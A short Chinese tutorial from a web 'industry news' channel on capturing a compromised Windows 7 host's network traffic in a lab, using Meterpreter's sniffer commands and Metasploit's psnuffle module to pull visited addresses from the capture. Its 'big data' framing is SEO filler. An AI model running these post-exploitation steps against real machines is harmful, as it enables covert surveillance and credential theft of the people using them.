今天就跟大家聊聊有关大数据中如何捕获内网数据包,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木马及监听主机参考上篇文章:
内网渗透 -- 提升权限(利用提权漏洞)
二、捕获数据包
1、加载sniffer:load sniffer
2、查看网卡信息:sniffer_interfaces
3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2
4、进入小受,然后随便访问几个网站
4、将捕获到数据保存下来,默认保存地址/root
sniffer_dump 2 aiyou.cap
5、启动wireshark,打开保存下来的文件
三、通过解包模块解包
1、选择解包模块
use auxiliary/sniffer/psnuffle
2、查看需要设置的参数
show options
3、设置解包文件路径
set pcapfile /root/2.cap
4、运行,run,可以查看到我们刚才访问的地址
看完上述内容,你们对大数据中如何捕获内网数据包有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。